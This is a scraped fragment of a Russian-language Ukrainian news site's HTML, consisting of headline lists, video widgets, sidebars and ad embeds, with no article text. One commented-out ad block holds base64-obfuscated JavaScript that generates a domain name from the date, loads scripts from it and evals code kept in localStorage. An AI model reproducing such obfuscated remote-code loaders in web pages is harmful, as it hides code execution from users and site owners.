url(/wp-content/plugins/ajax-comment-loading/css/style.css?v=8);</style><noscript>Для загрузки комментариев нужен JavaScript.</noscript><div id="comments-loading" style="display:none">Комментарии...</div><div id="comments-loaded"></div><input type="hidden" name="comments_nonce" value="3984444045" id="comments_nonce" /><script type="text/javascript">document.getElementById('comments-loading').style.display = 'block';</script></div>  </div><br /><div id='div-gpt-ad-1531223757969-0' style='height:600px; width:300px;'><script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1531223757969-0'); });</script></div><br> <div class="mainPageWiget articles" style="overflow:visible;"><p style="height: auto;overflow: visible; font-weight: 700;font-family: arial,verdana,tahoma;margin: 0;"><a style="color:#000;font-size: 16px;" href="https://enovosty.com/articles">Аналитика</a></p><hr style="border: 1px solid #000000;"><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4813365"><div class="blockTitle"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/ei_size.gif" /><a class="postTitle" href="https://enovosty.com/politika/full/2907-viktor-taran-novoe-peremirie-na-donbasse-mozhet-okazatsya-troyanskim-konem-dlya-ukrainy">Виктор Таран: Новое перемирие на Донбассе может оказаться «троянским конем» для Украины</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4813205"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/ekonomika/full/2807-koronakrizis-evrope-razdayut-besplatno-dengi-ukrainu-dushat-procentami-i-usloviyami-mvf">Коронакризис: Европе раздают бесплатно деньги, Украину душат процентами и условиями МВФ</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4812915"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/2407-takaya-strannaya-armyano-azerbajdzhanskaya-vojna-komu-eto-vygodno-prichiny-novoj-eskalacii">Такая странная армяно-азербайджанская война: Кому это выгодно - причины новой эскалации</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4812322"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/2007-sibir-i-dalnij-vostok-get-vid-moskvi">Сибирь и Дальний Восток: геть від Москви?..</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4812178"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1707-god-v-turborezhime-kak-porabotali-deputaty-verxovnoj-rady-i-kakimi-skandalami-otlichilis">"Год в турборежиме": как поработали депутаты Верховной Рады и какими скандалами отличились</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4811394"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1007-mixail-chaplyga-net-bolee-strashnogo-xozyaina-chem-byvshij-sluga">Михаил Чаплыга: «Нет более страшного хозяина, чем бывший слуга»</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4811398"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/ekonomika/full/1007-las-vegas-po-ukrainski-kakim-budet-igornyj-biznes-pri-zelenskom">Лас-Вегас по-украински: каким будет игорный бизнес при Зеленском?</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4811057"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/707-putin-zhil-putin-zhiv-putin-budet-zhit-do-2036-goda-esli-dotyanet">Путин жил, Путин жив, Путин будет жить. До 2036 года, если дотянет...</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4810700"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/ekonomika/full/307-aleksej-kucherenko-vidosiki-s-dalnobojshhikami-i-korabelnoj-baboj-ugrobyat-energetiku-ukrainy">Алексей Кучеренко: Видосики с дальнобойщиками и корабельной бабой угробят энергетику Украины</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4810644"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/finance/full/207-smolij-poshel-va-bank-mneniya-ekspertov-o-gromkoj-otstavke-glavy-nacbanka">Смолий пошел ва-банк: мнения экспертов о громкой отставке главы Нацбанка</a></div><div class="more"><a href="https://enovosty.com/articles">Все статьи</a></div></div></div><script async src="//whhrux.com/8ny1l7192ivl0mp/y03h8q768vuq/678ypkeqn6.php"></script><div data-la-block="dc72cd02-a35e-4362-9683-673dfde66e41"></div><br><script async src="//whhrux.com/50c7l1912vli/m0p30yh8q768vuq786pkybrgz6.php"></script><div data-la-block="fc0a9a9b-1dbe-46f7-b141-804f98afe650"></div><br /> <div id="M606809ScriptRootC950487"> </div> <script src="https://jsc.mgid.com/e/n/enovosty.com.950487.js" async></script> <div id='div-gpt-ad-1594991505318-0' style='width: 1px; height: 1px;'> <script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1594991505318-0'); });</script></div> <div id="pop_video" class="six"><p class="head"><span>популярные видео</span></p><div class="caption" data-limit="6"> <div class="caption_link"><a href="javascript:void(0)" class="active" onclick="getbVideo(0)">читаемые</a>&nbsp;&nbsp;<a href="javascript:void(0)" data-rb="1" onclick="getbVideo(1)">комментируемые</a></div><div class="popular-sort"><div class="sort"><a onclick="getPopVideo(31)">месяц</a></div><div class="sort"><a class="active" onclick="getPopVideo(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">за&#160;&#160;<a onclick="getPopVideo(1)">сутки</a>&nbsp;&nbsp;|</div></div></div> <table style="width:100%;" class="newsbody"><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_society/full/2507-uzhin-na-dvoix-francuzskij-buldog-smeshno-kopiruet-svoego-xozyaina-video"><img width="142" height="88" alt="Ужин на двоих: французский бульдог смешно копирует своего хозяина" src="https://enovosty.com/wp-content/uploads/2020/07/buldog-e1489964789680.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_society/full/2507-uzhin-na-dvoix-francuzskij-buldog-smeshno-kopiruet-svoego-xozyaina-video">Ужин на двоих: французский бульдог смешно копирует своего хозяина</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_incidents/full/2907-v-kieve-lyubiteli-ekstrima-prygali-v-dnepr-pryamo-s-kryshi-vagona-metro-video"><img width="142" height="88" alt="В Киеве любители экстрима прыгали в Днепр прямо с крыши вагона метро" src="https://enovosty.com/wp-content/uploads/2020/07/2528691-e1596014078764.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_incidents/full/2907-v-kieve-lyubiteli-ekstrima-prygali-v-dnepr-pryamo-s-kryshi-vagona-metro-video">В Киеве любители экстрима прыгали в Днепр прямо с крыши вагона метро</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news_abroad/full/2507-putina-v-otstavku-v-xabarovske-sobralas-samaya-massovaya-v-istorii-akciya-protesta-video"><img width="142" height="88" alt="Путина в отставку: В Хабаровске собралась самая массовая в истории акция протеста" src="https://enovosty.com/wp-content/uploads/2020/07/113641457_khabarovsk_afp.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/2507-putina-v-otstavku-v-xabarovske-sobralas-samaya-massovaya-v-istorii-akciya-protesta-video">Путина в отставку: В Хабаровске собралась самая массовая в истории акция протеста</a></div></td></tr><tr><td class="view"><span><i></i>11827</span></td><td class="view"><span><i></i>7405</span></td><td class="view last"><span><i></i>4571</span></td></tr><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_technology/full/2707-samyj-bolshoj-v-mire-samolet-amfibiya-sovershil-svoj-pervyj-vzlet-iz-vody"><img width="142" height="88" alt="Самый большой в мире самолет-амфибия впервые прошел морские испытания" src="https://enovosty.com/wp-content/uploads/2020/07/e51c81cd-045a-4949-8a94-089dafbd9f4f-e1595831039632.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_technology/full/2707-samyj-bolshoj-v-mire-samolet-amfibiya-sovershil-svoj-pervyj-vzlet-iz-vody">Самый большой в мире самолет-амфибия впервые прошел морские испытания</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_abroad/full/2707-poyavilos-neveroyatnoe-video-posadki-c-130-hercules-na-novom-takticheskom-aerodrome-video"><img width="142" height="88" alt="Появилось невероятное видео посадки C-130 Hercules на новом тактическом аэродроме" src="https://enovosty.com/wp-content/uploads/2020/07/screenshot_1-16-e1595828099483.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/2707-poyavilos-neveroyatnoe-video-posadki-c-130-hercules-na-novom-takticheskom-aerodrome-video">Появилось невероятное видео посадки C-130 Hercules на новом тактическом аэродроме</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news_society/full/2507-okkupanty-utopili-bronemashinu-v-kerchenskom-prolive-video"><img width="142" height="88" alt="Оккупанты утопили бронемашину в Керченском проливе" src="https://enovosty.com/wp-content/uploads/2020/07/voda_bt.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_society/full/2507-okkupanty-utopili-bronemashinu-v-kerchenskom-prolive-video">Оккупанты утопили бронемашину в Керченском проливе</a></div></td></tr><tr><td class="view"><span><i></i>3466</span></td><td class="view"><span><i></i>3418</span></td><td class="view last"><span><i></i>2166</span></td></tr></table><div class="more"><a href="https://enovosty.com/video">Все Видео</a></div></div><br> <div id='div-gpt-ad-1516280158772-0' style='height:60px; width:468px;'></div><script type='text/javascript'>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1516280158772-0'); });</script></br><div class="wiget text_chit"><p style="margin:0; padding-left:10px; font-size: 12px;">Читайте также</p><table cellpadding="0" cellspacing="0" border="0" class="table_chit"><tr><td> <a class="postTitle" href="https://enovosty.com/news_society/full/1307-sbu-blokirovala-rabotu-mezhdunarodnoj-prestupnoj-gruppy" rel="bookmark">СБУ блокировала работу международной преступной группы</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1606-glava-voz-edet-v-pekin-nesmotrya-na-raznoglasiya-s-ssha" rel="bookmark">Глава ВОЗ едет в Пекин, несмотря на разногласия с США</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2304-v-smi-rasskazali-kak-kreml-nanyos-udar-sam-po-sebe" rel="bookmark">В СМИ рассказали, как Кремль нанёс удар сам по себе</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_society/full/204-v-ukraine-otkroetsya-chast-zavedenij-podrobnosti" rel="bookmark">В Украине откроется часть заведений: подробности</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_society/full/2303-sbu-presekla-deyatelnost-rasprostranitelya-fejkov-o-koronaviruse-video" rel="bookmark">СБУ пресекла деятельность распространителя фейков о коронавирусе (ВИДЕО)</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2003-pompeo-obvinil-rossiyu-kitaj-i-iran-v-dezinformacii-o-koronaviruse" rel="bookmark">Помпео обвинил Россию, Китай и Иран в дезинформации о коронавирусе</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1303-popytki-rf-vmeshatsya-v-prezidentskie-vybory-ssha-stanovyatsya-vse-bolee-izoshhrennymi-associated-press" rel="bookmark">Попытки РФ вмешаться в президентские выборы США становятся все более изощренными, - Associated Press</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_politics/full/403-dzhentelmen-udachi-ili-bolshie-priklyucheniya-goncharuka-v-kabmine-final" rel="bookmark">Джентельмен удачи или большие приключения Гончарука в Кабмине. Финал.</a><br /></td> </tr><tr></tr></table></div><div class="bannerB"><div id="phoenix57c02c9d4f32fe394547dcf1"></div><script>var site_id = "57768bd94f32fe17ccf62bcc";var widget_id = "57c02c9d4f32fe394547dcf1";</script><script src="//phoenix-widget.com/static/js/jsonp.js"></script></div><!--<div id="MIXADV_6543" class="MIXADVERT_NET"></div><script>var node6543 = document.getElementById("MIXADV_6543");if( node6543 )
{var script = document.createElement("script");script.charset = "utf-8";script.src = "https://m.mixadvert.com/show/?id=6543&r="+Math.random();
node6543.parentNode.appendChild(script);script.onerror = function(){window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDY1NDMgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNjU0My5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgc2NyaXB0X3NlY29uZCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9zZWNvbmQuc3JjID0gImh0dHBzOi8vIisgaG9zdCsiIjsgbm9kZTY1NDMucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfc2Vjb25kKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTY1NDMuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjY1NDMiKSkgfSwgNTAwMCk7ICA7fTsg") );}}</script>
--><div id="WHwvwcq55RuJtgZm5orj" data-type="0" class="blockOfO1b2l3" ></div><script>window.RESOURCE_O1B2L3 = 'hvnwoeo.pro';</script><script src="//hvnwoeo.pro/eXu/EjSt.js" ></script><br><div class="wiget simple_pr" style="margin:0 0 10px;display:block; position:relative;" id="theme_posts"> <div class="caption "> <p>Новости мира</p><div class="popular-sort"><div class="sort"><a id="theme_31" onClick="getThemePopPosts(31, '4244,8', 4244, 15)">месяц</a></div><div class="sort"><a id="theme_7"style="text-decoration: underline;" onClick="getThemePopPosts(7, '4244,8', 4244, 15)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="theme_1" onClick="getThemePopPosts(1, '4244,8', 4244, 15)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <h3 class="press"><a href="https://enovosty.com/news_abroad/full/2807-rzhavye-vedra-v-britanii-vysmeyali-voenno-morskoj-parad-v-rf">"Ржавые ведра": В Британии высмеяли военно-морской парад в РФ (13432)</a></h3><h3 class="press"><a href="https://enovosty.com/news_abroad/full/2807-u-beregov-indii-pojmali-gigantskogo-skata-vesom-800-kg-foto">У берегов Индии поймали гигантского ската весом 800 кг (ФОТО) (6529)</a></h3><h3 class="press"><a href="https://enovosty.com/news_abroad/full/2207-voennyj-ekspert-rasskazal-kak-ssha-mogut-paralizovat-rossiyu-odnim-udarom">Военный эксперт рассказал, как США могут парализовать Россию одним ударом (5652)</a></h3><h3 class="press"><a href="https://enovosty.com/news_abroad/full/2607-mnogotysyachnuyu-akciyu-protesta-v-rossijskom-xabarovske-pokazali-s-vysoty-ptichego-poleta">Многотысячную акцию протеста в российском Хабаровске показали с высоты птичьего полета (4484)</a></h3><h3 class="press"><a href="https://enovosty.com/news_abroad/full/2407-v-plate-rubashke-i-s-krupnymi-lokonami-kejt-middlton-snova-porazila-poklonnikov-svoim-obrazom-foto">В платье-рубашке и с крупными локонами: Кейт Миддлтон снова поразила поклонников своим образом (ФОТО) (4430)</a></h3><h3 class="press"><a href="https://enovosty.com/news_abroad/full/2307-u-rossii-perestali-pokupat-neft">У России перестали покупать нефть (4123)</a></h3><h3 class="press"><a href="https://enovosty.com/news_abroad/full/2707-poyavilos-neveroyatnoe-video-posadki-c-130-hercules-na-novom-takticheskom-aerodrome-video">Появилось невероятное видео посадки C-130 Hercules на новом тактическом аэродроме (ВИДЕО) (3413)</a></h3><h3 class="press"><a href="https://enovosty.com/news_abroad/full/2407-v-ssha-zayavili-chto-rossiya-tajno-ispytyvaet-oruzhie-v-kosmose">В США заявили, что Россия тайно испытывает оружие в космосе (2970)</a></h3><h3 class="press"><a href="https://enovosty.com/news_abroad/full/2807-bolgariya-ostanovila-tranzit-rossijskogo-gaza-v-greciyu">Болгария остановила транзит российского газа в Грецию (2597)</a></h3><h3 class="press"><a href="https://enovosty.com/news_abroad/full/2507-ekonomist-predrek-padenie-rossijskoj-ekonomike-volna-bednosty-nakrila-rossiyu">Волна бедности накрыла Россию: Экономисты предупреждают о падении российской экономики (2539)</a></h3></div> </div><div class="mainarmiya"><p><a style="font-size: 17px;" href="https://enovosty.com/armiya">Армия</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4378476"><a href="https://enovosty.com/armiya/full/827-bronirovannyj-avtomobil-kraz-spartan-spartan" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/08/KrAZ_Spartan-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/08/KrAZ_Spartan-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/08/KrAZ_Spartan-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/08/KrAZ_Spartan.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/827-bronirovannyj-avtomobil-kraz-spartan-spartan" >Бронированный автомобиль KRAZ SPARTAN (СПАРТАН)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4387202"><a href="https://enovosty.com/armiya/full/173-samolet-palubnyj-istrebitel-bombardirovshhik-boeing-fa-18ef-super-hornet" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/09/FA-18_Hornet-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/09/FA-18_Hornet-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/09/FA-18_Hornet-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/09/FA-18_Hornet.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/173-samolet-palubnyj-istrebitel-bombardirovshhik-boeing-fa-18ef-super-hornet" >Самолет палубный истребитель-бомбардировщик Boeing F/A-18E/F Super Hornet (США)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4475738"><a href="https://enovosty.com/armiya/full/378-bronetransporter-varan" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2015/10/Varan-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/10/Varan-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2015/10/Varan-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/10/Varan.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/378-bronetransporter-varan" >Бронетранспортер «Варан»</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4564966"><a href="https://enovosty.com/armiya/full/532-broneavtomobil-bars-6" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2016/10/bars6-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2016/10/bars6-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2016/10/bars6-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2016/10/bars6.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/532-broneavtomobil-bars-6" >Бронеавтомобиль «Барс-6»</a></div></td> </tr> </table> <a href="https://enovosty.com/armiya" class="allarmiya">Вся армия&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="mainperson"><p><a style="font-size: 17px;" href="https://enovosty.com/person">Персоны</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4307427"><a href="https://enovosty.com/person/full/melnik-petr" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/08/melnik_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/08/melnik_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/08/melnik_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/melnik-petr" >Мельник<br /> Петр</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4316066"><a href="https://enovosty.com/person/full/lagard-kristin" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/09/lagard_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/09/lagard_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/09/lagard_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/lagard-kristin" >Лагард<br /> <br /> Кристин</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4328348"><a href="https://enovosty.com/person/full/181-kostelman-vladimir" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/12/kostelman_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/12/kostelman_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/12/kostelman_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/181-kostelman-vladimir" >Костельман<br /> Владимир</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4421255"><a href="https://enovosty.com/person/full/836-stec-yurij" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2015/01/stets-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/01/stets-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/01/stets.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/836-stec-yurij" >Стець<br /> Юрий</a></div></td> </tr> </table> <a href="https://enovosty.com/person" class="allperson">Все персоны&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="wiget simple_pr" id="pop_posts"> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" style="text-decoration: underline;" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/news_incidents/full/2907-v-kieve-lyubiteli-ekstrima-prygali-v-dnepr-pryamo-s-kryshi-vagona-metro-video">В Киеве любители экстрима прыгали в Днепр прямо с крыши вагона метро (ВИДЕО) (7399)</a></p><p class="press"><a href="https://enovosty.com/zdorove/full/2907-stalo-izvestno-pochemu-vysokie-muzhchiny-chashhe-zarazhayutsya-koronavirusom">Стало известно, почему высокие мужчины чаще заражаются коронавирусом (3070)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/2907-v-afrike-unichtozheny-rossijskie-zrpk-pancir-s1">В Африке уничтожены российские ЗРПК «Панцирь-С1» (2476)</a></p><p class="press"><a href="https://enovosty.com/uk/news_abroad-ukr/full/2807-rosijski-vinishhuvachi-su-27-porushili-povitryanij-prostir-finlyandii">Російські винищувачі Су-27 порушили повітряний простір Фінляндії (1723)</a></p><p class="press"><a href="https://enovosty.com/uk/news-auto-ukr/full/2907-na-ukrainskix-vodiiv-mozhut-chekati-novi-perevirki">На українських водіїв можуть чекати нові перевірки (1691)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/2907-armyano-azerbajdzhanskij-konflikt-priobretaet-mezhdunarodnyj-xarakter-turciya-napravila-svoi-vojska-v-azerbajdzhan-video">Армяно-азербайджанский конфликт приобретает международный характер: Турция направила свои войска в Азербайджан (ВИДЕО) (1600)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/2907-v-evrope-zayavili-o-novoj-volne-koronavirusa">В Европе заявили о новой волне коронавируса (1599)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/2907-takticheskaya-aviaciya-vozdushnyx-sil-ottachivaet-gruppovuyu-sletannost-i-vozdushnye-boi-minoborony">Тактическая авиация Воздушных сил оттачивает групповую слетанность и воздушные бои, - Минобороны (1592)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/2907-v-minzdrave-sdelali-vazhnoe-zayavlenie-o-rabote-shkol">В Минздраве сделали важное заявление о работе школ (1461)</a></p><p class="press"><a href="https://enovosty.com/news_politics/full/2907-erdogan-pokazal-miru-chto-putin-uzhe-ne-tot-opasnyj-i-vsesilnyj-prezident">Эрдоган показал миру, что Путин уже не тот опасный и всесильный президент (1461)</a></p></div> </div></div> </div><style>#sidebarRight{margin-top:-227px}</style><div id="sidebarRight" style="width:300px;" ><form method="get" id="searchform" action="https://enovosty.com/"><div class="search300"> <input type="text" value="" name="s" id="s" /> <input type="hidden" name="arh_title" value="on"> <input type="hidden" name="arh_text" value="on"> <input type="hidden" name="arh_news" value="on"> <input type="hidden" name="arh_posts" value="on"><input type="submit" id="searchsubmit" value="Поиск" /></div></form><div class="wiget simple_pr socnet"><div class="caption"><p>Последние новости в соцсетях</p></div> <table><tr><td><a href="https://www.facebook.com/enovosty/" rel="nofollow" target="_blank" class="facebook"><i></i></a></td><td><a href="https://twitter.com/enovosty" rel="nofollow" target="_blank" class="twitter"><i></i></a></td><td><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" rel="nofollow" target="_blank" class="you_tube"><i style="background: url(https://enovosty.com/wp-content/themes/eizvestia/img/You_Tube.png) no-repeat;"></i></a></td><td><a href="https://t.me/enovosty" rel="nofollow" target="_blank" class="telegram"><i style="background: url(https://enovosty.com/wp-content/themes/eizvestia/img/Telegram1_Obem1.png) no-repeat;"></i></a></td></tr></table></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:600px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="9027886280"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><div class="wiget simple_pr" style="margin-top:5px;"><div class="caption"><div class="popular-sort-link"><a href="https://enovosty.com/publications">Публикации</a></div></div> <p class="press"><a href="https://enovosty.com/publications/full/2107-import-spisannyx-vagonov-iz-rossii-kak-prigovor-zdravomu-smyslu">Импорт списанных вагонов из России как приговор здравому смыслу</a></p><p class="press"><a href="https://enovosty.com/publications/full/2007-chto-skryvaetsya-za-arestom-eks-glavy-ukravtodora-slavomira-novak">Что скрывается за арестом экс-главы «Укравтодора» Славомира Новака</a></p><p class="press"><a href="https://enovosty.com/publications/full/907-forbes-rossiya-i-armanzhan-bajtasov-kak-kazax-kontroliruet-rejtingi-bogatejshix-rossiyan">Forbes Россия и Арманжан Байтасов: как казах контролирует рейтинги богатейших россиян</a></p></div><br><div onclick="trackOutboundLink(this, 'Verum', 'verum.ua');"><a href="https://verum.ua/11-faktiv/" target="_blank" rel="noopener"><img alt="Verum" src="/wp-content/uploads/2020/07/verum.jpg"></a></div><br><div id='div-gpt-ad-1594112815543-0'> <script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1594112815543-0'); });</script></div><div id="adriver_banner_C3"></div> <div class="wiget simple_line infblogs"> <div class="caption"><a href="https://enovosty.com/blogs">Мнения</a></div><div class="block"><div class="cblock"><a href="https://enovosty.com/blogs/full/307-dodavili-banki-dodavim-i-ekonomiku"><img alt="Додавили банки, додавим и экономику" src="https://enovosty.com/wp-content/uploads/2020/07/im578x383-fursa-112x74.jpg"><div>Сергей Фурса</div></a></div><p><a class="postTitle" href="https://enovosty.com/blogs/full/307-dodavili-banki-dodavim-i-ekonomiku">Додавили банки, додавим и экономику</a></p><span class="postExcerpt"><a href="https://enovosty.com/blogs/full/307-dodavili-banki-dodavim-i-ekonomiku">Пал последний форпост. 